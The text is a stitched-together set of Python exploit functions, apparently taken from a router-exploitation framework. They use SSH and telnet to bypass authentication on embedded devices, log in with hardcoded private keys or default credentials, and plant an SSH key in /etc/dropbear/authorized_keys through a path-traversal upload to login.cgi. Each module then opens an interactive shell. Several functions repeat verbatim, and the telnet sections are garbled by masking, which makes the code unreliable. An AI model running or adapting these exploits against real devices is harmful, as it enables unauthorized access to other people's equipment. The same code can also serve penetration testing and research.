def run(self):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(self.target, username='', allow_agent=False, look_for_keys=False)
except paramiko.ssh_exception.SSHException:
pass
except:
print_error("Exploit Failed - SSH Service is down")
return
trans = client.get_transport()
try:
trans.auth_password(username='******', password='', event=None, fallback=True)
except paramiko.ssh_exception.AuthenticationException:
pass
except:
print_status("Error with Existing Session. Wait few minutes.")
return
try:
trans.auth_interactive(username='******', handler=self.custom_handler)
print_success("Exploit succeeded")
ssh_interactive(client)
except:
print_error("Exploit failed")
return
def run(self):
if self.check():
if "DSA PRIVATE KEY" in self.valid['private_key']:
pkey = paramiko.DSSKey.from_private_key(
StringIO.StringIO(self.valid['private_key']))
elif "RSA PRIVATE KEY" in self.valid['private_key']:
pkey = paramiko.RSAKey.from_private_key(
StringIO.StringIO(self.valid['private_key']))
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(self.target,
22,
timeout=5,
username=self.valid['user'],
pkey=pkey)
except:
ssh.close()
print_error("Device seems to be not vulnerable")
else:
print_success("SSH - Successful authentication")
ssh_interactive(ssh)
else:
print_error("Exploit failed - target seems to be not vulnerable")
def run(self):
if self.check():
print_success('Target is vulnerable')
print_success('Trying to exploit by uploading SSH public key')
key = paramiko.RSAKey.generate(1024)
public_key = key.get_base64()
private_key = StringIO.StringIO()
key.write_private_key(private_key)
tmp_file_pubkey = tempfile.TemporaryFile()
tmp_file_pubkey.write('ssh-rsa ' + public_key)
tmp_file_pubkey.seek(0)
upload_params = {
'file':
('../../etc/dropbear/authorized_keys', tmp_file_pubkey, {
'Expect': ''
})
}
upload_url = '{0}:{1}/login.cgi'.format(self.target, self.port)
response = http_request(url=upload_url,
method='POST',
files=upload_params)
if response is None:
print_error(
'Something was wrong while uploading the SSH Public Key')
return
print_success('Appareantly the exploit worked fine')
print_success('Trying to invoke a interactive SSH Shell')
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
pseudo_privkey_file = StringIO.StringIO(private_key.getvalue())
pkey = paramiko.RSAKey.from_private_key(pseudo_privkey_file)
pseudo_privkey_file.close()
private_key.close()
ip_target = self.target.replace('https://', '')
ip_target = ip_target.replace('http://', '')
ip_target = ip_target.replace('/', '')
client.connect(ip_target,
self.ssh_port,
username='******',
pkey=pkey)
ssh_interactive(client)
else:
print_error('Target is not vulnerable')
def run(self):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(self.target, 22, timeout=5, username=self.user, password=self.password)
except (paramiko.ssh_exception.SSHException, socket.error):
print_error("Exploit failed - cannot log in with credentials {} / {}".format(self.user, self.password))
return
else:
print_success("SSH - Successful authentication")
ssh_interactive(ssh)
def init_ssh_session(self, username, password):
print_status("Trying to authenticate through SSH with username: {} password:{} account".format(username, password))
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
target = self.target.replace("http://", "").replace("https://", "")
try:
ssh.connect(target, 22, timeout=5, username=username, password=password)
except:
ssh.close()
else:
print_success("SSH - Successful authentication")
ssh_interactive(ssh)
return
def run(self):
if self.check():
print_success('Target is vulnerable')
print_success('Trying to exploit by uploading SSH public key')
key = paramiko.RSAKey.generate(1024)
public_key = key.get_base64()
private_key = StringIO.StringIO()
key.write_private_key(private_key)
tmp_file_pubkey = tempfile.TemporaryFile()
tmp_file_pubkey.write('ssh-rsa ' + public_key)
tmp_file_pubkey.seek(0)
upload_params = {'file': ('../../etc/dropbear/authorized_keys', tmp_file_pubkey, {'Expect': ''})}
upload_url = '{0}:{1}/login.cgi' .format(self.target, self.port)
response = http_request(url=upload_url, method='POST', files=upload_params)
if response is None:
print_error('Something was wrong while uploading the SSH Public Key')
return
print_success('Appareantly the exploit worked fine')
print_success('Trying to invoke a interactive SSH Shell')
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
pseudo_privkey_file = StringIO.StringIO(private_key.getvalue())
pkey = paramiko.RSAKey.from_private_key(pseudo_privkey_file)
pseudo_privkey_file.close()
private_key.close()
ip_target = self.target.replace('https://', '')
ip_target = ip_target.replace('http://', '')
ip_target = ip_target.replace('/', '')
client.connect(ip_target, self.ssh_port, username='******', pkey=pkey)
ssh_interactive(client)
else:
print_error('Target is not vulnerable')
def run(self):
if self.check():
if "DSA PRIVATE KEY" in self.valid['private_key']:
pkey = paramiko.DSSKey.from_private_key(StringIO.StringIO(self.valid['private_key']))
elif "RSA PRIVATE KEY" in self.valid['private_key']:
pkey = paramiko.RSAKey.from_private_key(StringIO.StringIO(self.valid['private_key']))
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(self.target, 22, timeout=5, username=self.valid['user'], pkey=pkey)
except:
ssh.close()
print_error("Device seems to be not vulnerable")
else:
print_success("SSH - Successful authentication")
ssh_interactive(ssh)
else:
print_error("Exploit failed - target seems to be not vulnerable")
def run(self):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(self.target,
self.ssh_port,
timeout=5,
username=self.username,
password=self.password)
except Exception:
ssh.close()
else:
print_success("SSH - Successful authentication")
ssh_interactive(ssh)
return
try:
tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
tn.write("\r\n")
tn.expect(["Login: "******"login: "******"\r\n")
tn.expect(["Password: "******"password"], 5)
tn.write(self.password + "\r\n")
tn.write("\r\n")
(i, obj, res) = tn.expect(["Failed", "failed"], 5)
if i != -1:
return False
else:
if any(map(lambda x: x in res, ["#", "$", ">"])):
print_success("Telnet - Successful authentication")
tn.write("\r\n")
tn.interact()
tn.close()
except Exception:
print_error("Connection Error")
return
def run(self):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(self.target, self.ssh_port, timeout=5, username=self.username, password=self.password)
except Exception:
ssh.close()
else:
print_success("SSH - Successful authentication")
ssh_interactive(ssh)
return
try:
tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
tn.write("\r\n")
tn.expect(["Login: "******"login: "******"\r\n")
tn.expect(["Password: "******"password"], 5)
tn.write(self.password + "\r\n")
tn.write("\r\n")
(i, obj, res) = tn.expect(["Failed", "failed"], 5)
if i != -1:
return False
else:
if any(map(lambda x: x in res, ["#", "$", ">"])):
print_success("Telnet - Successful authentication")
tn.write("\r\n")
tn.interact()
tn.close()
except Exception:
print_error("Connection Error")
return